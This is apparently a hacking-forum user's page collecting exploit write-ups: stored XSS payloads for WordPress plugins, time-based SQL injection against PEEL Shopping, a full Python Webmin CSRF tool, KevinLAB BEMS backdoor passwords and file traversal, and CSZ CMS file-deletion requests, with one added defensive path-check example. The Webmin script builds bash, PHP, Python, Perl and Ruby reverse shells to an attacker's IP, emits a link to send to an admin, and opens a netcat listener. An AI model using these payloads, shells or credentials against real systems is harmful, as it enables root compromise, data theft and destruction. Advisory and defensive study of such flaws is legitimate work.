
Everything posted by HireHackking
-
WordPress Plugin KN Fix Your Title 1.0.1 - 'Separator' Stored Cross-Site Scripting (XSS)
# Exploit Title: WordPress Plugin KN Fix Your Title 1.0.1 - 'Separator' Stored Cross-Site Scripting (XSS)
# Date: 19/07/2021
# Exploit Author: Aakash Choudhary
# Software Link: https://wordpress.org/plugins/kn-fix-your/
# Version: 1.0.1
# Category: Web Application
# Tested on: Mac

How to Reproduce this Vulnerability:

1. Install WordPress 5.7.2
2. Install and activate KN Fix Your Title
3. Navigate to Fix Title under the Settings tab >> click on "I have done this" and enter the XSS payload into the Separator input field.
4. Click Save Changes.
5. You will observe that the payload got stored in the database; when the same functionality is triggered again, the JavaScript payload executes and a pop-up appears.
6. Payload Used: "><script>alert(document.cookie)</script>
-
PEEL Shopping 9.3.0 - 'id' Time-based SQL Injection
# Exploit Title: PEEL Shopping 9.3.0 - 'id' Time-based SQL Injection
# Date: 2021-07-10
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://www.peel.fr
# Software Link: https://sourceforge.net/projects/peel-shopping/files/peel-shopping_9_3_0.zip/download
# Version: prior to 9.4.0
# Tested on: Windows 10, XAMPP
# Reference: https://github.com/advisto/peel-shopping/issues/3
# CVE: CVE-2021-37593

################
# Description  #
################

# PEEL Shopping is an eCommerce shopping cart application in PHP / MySQL which works on any hosting. A public user/guest (unauthenticated) can inject a malicious SQL query, affecting the execution of predefined SQL commands, via the "id" parameter on the "/peel-shopping_9_4_0/achat/produit_details.php?id=[SQLi]" endpoint. Upon a successful SQL injection attack, an attacker can read sensitive data from the database or modify database data.

#####################
# PoC of detection  #
#####################

1) Assuming the database name of an out-of-the-box peel-shopping_9_4_0 installation is peel. This query checks whether database() LIKE hex(%peel%); it delays for 7 seconds before redirecting to the homepage (http://localhost/peel-shopping_9_4_0/), which indicates a TRUE SQL statement, meaning the database name is like "peel".

PoC #1) param id - time-based SQLi

Payload: (SELECT+1337+FROM+(SELECT(SLEEP(7-(IF(DATABASE()+LIKE+0x257065656c25,0,5)))))FSXX)

Request: The response duration = 418 bytes | 7,719 millis
========
GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(7-(IF(DATABASE()+LIKE+0x257065656c25,0,5)))))FSXX) HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/peel-shopping_9_4_0/
DNT: 1
Connection: close
Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
Cache-Control: max-age=0

---

2) Assuming the web application uses a MariaDB database server: check whether VERSION() LIKE hex(%MariaDB%); it delays for 5 seconds if TRUE.

PoC #2) param id - time-based SQLi

Payload: (SELECT+1337+FROM+(SELECT(SLEEP(5-(IF(VERSION()+LIKE+0x254d61726961444225,0,5)))))FSXX)

Request: The response duration = 418 bytes | 5,112 millis
========
GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(5-(IF(VERSION()+LIKE+0x254d61726961444225,0,5)))))FSXX) HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/peel-shopping_9_4_0/
DNT: 1
Connection: close
Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
Cache-Control: max-age=0

---

3) By default, the database has a table named peel_produits. This query checks whether the table peel_produits exists; it delays for 10 seconds if TRUE, otherwise it redirects to the homepage instantly.

PoC #3) param id - time-based SQLi

Payload: (SELECT+1337+FROM+(SELECT(SLEEP(10-(IF(EXISTS(SELECT+3+FROM+peel.peel_produits),0,5)))))FSXX)

Request: The response duration = 418 bytes | 10,140 millis
========
GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(10-(IF(EXISTS(SELECT+3+FROM+peel.peel_produits),0,5)))))FSXX) HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/peel-shopping_9_4_0/
DNT: 1
Connection: close
Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
Cache-Control: max-age=0

---

# For more explanation, refer to the GitHub issue on peel-shopping: https://github.com/advisto/peel-shopping/issues/3.
# The affected versions are prior to 9.4.0. The issue is fixed in version 9.4.0.1.
# The vendor has released the patched version 9.4.0.1, available for download from sourceforge.net [https://sourceforge.net/projects/peel-shopping/files/peel-shopping_9_4_0_1.zip/download]
-
WordPress Plugin Mimetic Books 0.2.13 - 'Default Publisher ID field' Stored Cross-Site Scripting (XSS)
# Exploit Title: WordPress Plugin Mimetic Books 0.2.13 - 'Default Publisher ID field' Stored Cross-Site Scripting (XSS)
# Date: 18/07/2021
# Exploit Author: Vikas Srivastava
# Vendor Homepage:
# Software Link: https://wordpress.org/plugins/mimetic-books/
# Version: 0.2.13
# Category: Web Application
# Tested on: Mac

How to Reproduce this Vulnerability:

1. Install WordPress 5.7.2
2. Install and activate Mimetic Books
3. Navigate to Settings >> Mimetic Books API and enter the XSS payload into the Default Publisher ID input field.
4. Click Save Changes.
5. You will observe that the payload got stored in the database; when the same functionality is triggered again, the JavaScript payload executes and a pop-up appears.
6. Payload Used: "><script>alert(document.cookie)</script>
-
Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)
# Exploit Title: Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)
# Date: 24/04/2021
# Exploit Author: Mesh3l_911 & Z0ldyck
# Vendor Homepage: https://www.webmin.com
# Repo Link: https://github.com/Mesh3l911/CVE-2021-31761
# Version: Webmin 1.973
# Tested on: All versions <= 1.973
# CVE: CVE-2021-31761
# Description: Exploiting a Reflected Cross-Site Scripting (XSS) attack to
# get a Remote Command Execution (RCE) through the Webmin's running process
# feature

import time, subprocess, random, urllib.parse

# Banner (ASCII art)
print('''\033[1;37m
__ __ _ ____ _ _________ _ _ _ | \/ | | | |___ \| | |___ / _ \| | | | | | | \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __ | |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ / | | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| < |_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/ __/ | |___/
\033[1;m''')

for i in range(101):
    print("\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format(i), "\033[1;36m%\033[1;m", end="")
    time.sleep(0.02)
print("\n\n")

target = input("\033[1;36m \n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m")
if target.endswith('/'):
    target = target + 'tunnel/link.cgi/'
else:
    target = target + '/tunnel/link.cgi/'

ip = input("\033[1;36m \n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \033[1;m")
port = input("\033[1;36m \n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \033[1;m")

ReverseShell = input('''\033[1;37m
 1- Bash Reverse Shell
 2- PHP Reverse Shell
 3- Python Reverse Shell
 4- Perl Reverse Shell
 5- Ruby Reverse Shell
\033[1;m \033[1;36mPlease insert the number Reverse Shell's type u want e.g. ( 1 ) > \033[1;m''')

file_name = random.randrange(1000)

# Build the command that /proc/run.cgi will execute as root
if ReverseShell == '1':
    ReverseShell = 'mkfifo /tmp/' + str(file_name) + '; nc ' + ip + ' ' + port + ' 0</tmp/' + str(file_name) + ' | /bin/sh >/tmp/' + str(file_name) + ' 2>&1; rm /tmp/' + str(file_name)
elif ReverseShell == '2':
    ReverseShell = ''' php -r '$sock=fsockopen("''' + ip + '''",''' + port + ''');exec("/bin/sh -i <&3 >&3 2>&3");' '''
elif ReverseShell == '3':
    ReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("''' + ip + '''",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' '''
elif ReverseShell == '4':
    ReverseShell = ''' perl -e 'use Socket;$i="''' + ip + '''";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' '''
elif ReverseShell == '5':
    ReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open("''' + ip + '''",''' + port + ''').to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' '''
else:
    print("\033[1;36m \n Please Re-Check ur input :( \033[1;m \n")
    raise SystemExit(1)


def CSRF_Generator():
    # Auto-submitting form that POSTs the command to /proc/run.cgi (user=root)
    # from within the victim admin's authenticated Webmin session.
    Payload = urllib.parse.quote('''
<html>
<head>
<meta name="referrer" content="never">
</head>
<body>
<script>history.pushState('', '', '/')</script>
<form action="/proc/run.cgi" method="POST">
<input type="hidden" name="cmd" value="''' + ReverseShell + '''" />
<input type="hidden" name="mode" value="0" />
<input type="hidden" name="user" value="root" />
<input type="hidden" name="input" value="" />
<input type="hidden" name="undefined" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
''')
    print("\033[1;36m\nHere's ur link , send it to a Webmin's Admin and wait for ur Reverse Shell ^_^ \n \n\033[1;m")
    print(target + Payload)


def Netcat_listener():
    print()
    # Each option must be a separate argv element; "-nlvp 1337" as one argument is rejected by nc
    subprocess.run(["nc", "-nlvp", port])


def main():
    CSRF_Generator()
    Netcat_listener()


if __name__ == '__main__':
    main()
-
KevinLAB BEMS 1.0 - Undocumented Backdoor Account
# Exploit Title: KevinLAB BEMS 1.0 - Undocumented Backdoor Account
# Date: 05.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kevinlab.com

Vendor: KevinLAB Inc.
Product web page: http://www.kevinlab.com
Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System)

Summary: KevinLab is a venture company specialized in an IoT, Big Data and A.I. based energy management platform. KevinLAB's BEMS (Building Energy Management System) enables efficient energy management in buildings. It improves the efficiency of energy use by collecting and analyzing various information on energy usage and facilities in the building. It also manages energy usage, facility efficiency and indoor environment control.

Desc: The BEMS solution has an undocumented backdoor account; these credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution thru the RMI. An attacker could exploit this vulnerability by logging in using the backdoor account with the highest administrative privileges and gain full system control. The backdoor user cannot be seen in the user settings in the admin panel, and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the BEMS offers remotely.

Tested on: Linux CentOS 7
           Apache 2.4.6
           Python 2.7.5
           PHP 5.4.16
           MariaDB 5.5.68

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2021-5654
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php

05.07.2021

--

Backdoor accounts from the DB:
------------------------------

Username: kevinlab (permission=1)
Password: kevin003

Username: developer1 (permission=6)
Password: 1234
-
KevinLAB BEMS 1.0 - File Path Traversal Information Disclosure (Authenticated)
# Exploit Title: KevinLAB BEMS 1.0 - File Path Traversal Information Disclosure (Authenticated)
# Date: 05.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kevinlab.com

Vendor: KevinLAB Inc.
Product web page: http://www.kevinlab.com
Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System)

Summary: KevinLab is a venture company specialized in an IoT, Big Data and A.I. based energy management platform. KevinLAB's BEMS (Building Energy Management System) enables efficient energy management in buildings. It improves the efficiency of energy use by collecting and analyzing various information on energy usage and facilities in the building. It also manages energy usage, facility efficiency and indoor environment control.

Desc: The BEMS suffers from an authenticated arbitrary file disclosure vulnerability. Input passed through the 'page' GET parameter in index.php is not properly verified before being used to include files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks.

Tested on: Linux CentOS 7
           Apache 2.4.6
           Python 2.7.5
           PHP 5.4.16
           MariaDB 5.5.68

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2021-5656
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5656.php

05.07.2021

--

GET https://192.168.1.3/pages/index.php?page=../../../../etc/passwd HTTP/1.1

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
...
...
-
CSZ CMS 1.2.9 - 'Multiple' Arbitrary File Deletion
# Exploit Title: CSZ CMS 1.2.9 - 'Multiple' Arbitrary File Deletion
# Date: 2021-07-20
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://www.cszcms.com
# Software Link: https://sourceforge.net/projects/cszcms/files/latest/download
# Version: 1.2.9
# Tested on: Windows 10, XAMPP
# Reference: https://github.com/cskaza/cszcms/issues/32

################
# Description  #
################

# CSZ CMS is an open source Content Management System web application that allows managing all content and settings on a website. CSZ CMS is built on CodeIgniter 3 and structured with Bootstrap 3. When unsanitized user input is supplied to a file deletion function, an arbitrary file deletion vulnerability arises. This occurs in PHP when the unlink() function is called and user input can affect part or all of the parameter representing the path of the file to remove, without sufficient sanitization. Exploiting the vulnerability allows an attacker to delete any file in the web root (along with any other file on the server that the PHP process user has permission to delete). Furthermore, an attacker might leverage arbitrary file deletion to circumvent certain webserver security mechanisms, for example by deleting the .htaccess file, which would deactivate those security constraints.

##########
# PoC 1  #
##########

Vulnerable URL: http://localhost/CSZCMS-V1.2.9/admin/plugin/article/editArtSave
Vulnerable Code: line 116, 131 - cszcms\models\plugin\Article_model.php

Steps to Reproduce:

1. Login as admin
2. Go to Plugin Manager > Article > edit any article
3. Upload any image as "Main Picture" and "File Upload" and click the save button
4. Click the "Delete File" button for both "Main Picture" and "File Upload" and click the save button
5. Intercept the request and replace the existing image with any file on the server via the parameters "del_file" and "del_file2"

1) Assuming the files conf_secret_file.php and config_backup.txt exist in the web root

PoC #1) param del_file & del_file2 - Deleting the conf_secret_file.php and config_backup.txt files in the web root

Request:
========
POST /CSZCMS-V1.2.9/admin/plugin/article/editArtSave/4 HTTP/1.1
Host: localhost
Content-Length: 2048
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAMyATk1BfQaBOHvY
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/CSZCMS-V1.2.9/admin/plugin/article/artedit/4
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: last_views=a%3A3%3A%7Bi%3A0%3Bi%3A17%3Bi%3A1%3Bi%3A19%3Bi%3A2%3Bi%3A18%3B%7D; __atuvc=5%7C27; c4204054ab0d5b68399458e70744010b_cszsess=l9f1kpqohequemh1q3tt11j36hs99c25
Connection: close

------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="title"

article beta
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="keyword"

testing file
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="short_desc"

deletion
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="cat_id"

2
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="content"

<div class="row">
<div class="col-md-12">
<p>test for file deletion</p>
</div>
</div>
<p><br><br></p>
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="del_file"

../../../conf_secret_file.php
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="file_upload"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="mainPicture"

2021/1626802955_1.png
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="del_file2"

../../../config_backup.txt
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="file_upload2"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="mainFile"

2021/1626802956_1.png
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="lang_iso"

en
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="active"

1
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="fb_comment_active"

1
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="fb_comment_limit"

5
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="fb_comment_sort"

reverse_time
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="submit"

Save
------WebKitFormBoundaryAMyATk1BfQaBOHvY--

---

##########
# PoC 2  #
##########

Vulnerable URL: http://localhost/CSZCMS-V1.2.9/admin/settings/update
Vulnerable Code: line 944, 958 - cszcms\models\Csz_admin_model.php

Steps to Reproduce:

1. Login as admin
2. Go to General Menu > Site Setting
3. Upload any image as "Site Logo" and "Image of og metatag" and click the save button
4. Click the "Delete File" button for both "Site Logo" and "Image of og metatag" and click the save button
5. Intercept the request and replace the existing image with any file on the server via the parameters "del_file" and "del_og_image"

2) Assuming the files conf_secret_file.php and config_backup.txt exist in the web root

PoC #2) param del_file & del_og_image - Deleting conf_secret_file.php and config_backup.txt in the web root

Request:
========
POST /CSZCMS-V1.2.9/admin/settings/update HTTP/1.1
Host: localhost
Content-Length: 5163
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8cAl5KcKGP0D3Qi2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/CSZCMS-V1.2.9/admin/settings
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: last_views=a%3A3%3A%7Bi%3A0%3Bi%3A17%3Bi%3A1%3Bi%3A19%3Bi%3A2%3Bi%3A18%3B%7D; __atuvc=5%7C27; c4204054ab0d5b68399458e70744010b_cszsess=t5jloe106o2i5hst51chr5ita9aklieu
Connection: close

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="siteTitle"

CSZ CMS Starter
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="title_setting"

2
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="siteFooter"

© %Y% CSZ CMS Starter
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="siteKeyword"

CMS, Contact Management System, HTML, CSS, JS, JavaScript, framework, bootstrap, web development, thai, english
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="siteTheme"

cszdefault
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="siteLang"

english
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="additional_metatag"


------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="additional_js"


------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="pagecache_time"

0
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="assets_static_domain"

demo@cszcms.com
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="html_optimize_disable"

1
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="del_file"

../../conf_secret_file.php
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="file_upload"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="siteLogo"

2021/1626800829_logo.png
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="del_og_image"

../../config_backup.txt
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="og_image"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="ogImage"

2021/1626800829_og.png
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="siteEmail"

demo@cszcms.com
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="email_protocal"

mail
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="smtp_host"


------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="smtp_user"


------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="smtp_pass"

123456
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="smtp_port"


------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="sendmail_path"


------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="email_logs"

1
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="googlecapt_sitekey"


------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="googlecapt_secretkey"


------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="ga_client_id"


------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="ga_view_id"


------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="gsearch_cxid"


------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="gmaps_key"


------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="gmaps_lat"

-28.621975
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="gmaps_lng"

150.689082
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="fbapp_id"


------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="facebook_page_id"


------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="adobe_cc_apikey"


------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="cookieinfo_bg"

#645862
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="cookieinfo_fg"

#ffffff
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="cookieinfo_link"

#f1d600
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="cookieinfo_msg"

This website uses cookies to improve your user experience. By continuing to browse our site you accepted and agreed on our
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="cookieinfo_linkmsg"

Privacy Policy and terms.
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="cookieinfo_moreinfo"

https://www.cszcms.com/LICENSE.md
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="cookieinfo_txtalign"

left
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="cookieinfo_close"

Got it!
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="submit"

Save
------WebKitFormBoundary8cAl5KcKGP0D3Qi2--

---

# For more explanation, refer to the GitHub issue on cszcms: https://github.com/cskaza/cszcms/issues/32
# The affected version is 1.2.9.
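Both CSZ CMS requests above (del_file = ../../../conf_secret_file.php) and the KevinLAB traversal earlier on this page (page=../../../../etc/passwd) come from the same defect: a user-supplied file name is joined onto a base directory and handed to unlink() or include() without checking where the joined path really ends up. The following is an added example, not CSZ CMS's or KevinLAB's own code: a containment check that resolves the joined path (collapsing ".." and following symlinks) and refuses anything outside the base directory, applied to a deletion like the one in the PoC. The demo() scenario, the temporary directory, and the file names in it are constructed for illustration, reusing the names from the request above.

```python
"""Path-containment check for user-controlled file names (added example)."""
import os
import shutil
import tempfile
from typing import Optional


def resolve_inside(base_dir: str, user_path: str) -> Optional[str]:
    """Return the real path of base_dir/user_path, or None if it resolves outside base_dir.

    os.path.realpath() collapses '..' segments *and* follows symlinks, so a link
    planted inside the upload directory cannot be used to reach outside it either.
    An absolute user_path ('/etc/passwd') makes os.path.join() discard base_dir,
    which the containment check then rejects.
    """
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, user_path))
    try:
        # commonpath, not startswith: '/var/www/uploads-evil' would pass a prefix test.
        if os.path.commonpath([base, target]) != base:
            return None
    except ValueError:  # different drives on Windows
        return None
    return target


def safe_unlink(base_dir: str, user_path: str) -> bool:
    """Delete base_dir/user_path only if it resolves inside base_dir; True if a file was removed."""
    target = resolve_inside(base_dir, user_path)
    if target is None or not os.path.isfile(target):
        return False
    os.remove(target)
    return True


def demo() -> dict:
    """Constructed scenario: an uploads directory with one image and a secret file one level up."""
    root = tempfile.mkdtemp()
    uploads = os.path.join(root, "uploads")
    os.makedirs(os.path.join(uploads, "2021"))
    with open(os.path.join(uploads, "2021", "1626802955_1.png"), "wb") as f:
        f.write(b"png")
    with open(os.path.join(root, "conf_secret_file.php"), "w") as f:
        f.write("<?php // secret")
    try:
        return {
            # the value the form normally carries: deleted
            "legit": safe_unlink(uploads, "2021/1626802955_1.png"),
            # the PoC's traversal value: refused
            "traversal": safe_unlink(uploads, "../conf_secret_file.php"),
            # an absolute path: refused
            "absolute": resolve_inside(uploads, "/etc/passwd") is None,
            "secret_survives": os.path.exists(os.path.join(root, "conf_secret_file.php")),
        }
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    print(demo())
```

The same resolve-then-compare step is what a PHP fix would do with realpath() before unlink() or include(); an allowlist of known upload names or page identifiers is stricter still and is the better choice for the KevinLAB 'page' parameter, where the set of includable files is fixed.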
-
KevinLAB BEMS 1.0 - Authentication Bypass
# Exploit Title: KevinLAB BEMS 1.0 - Unauthenticated SQL Injection / Authentication Bypass
# Date: 05.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kevinlab.com

Vendor: KevinLAB Inc.
Product web page: http://www.kevinlab.com
Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System)

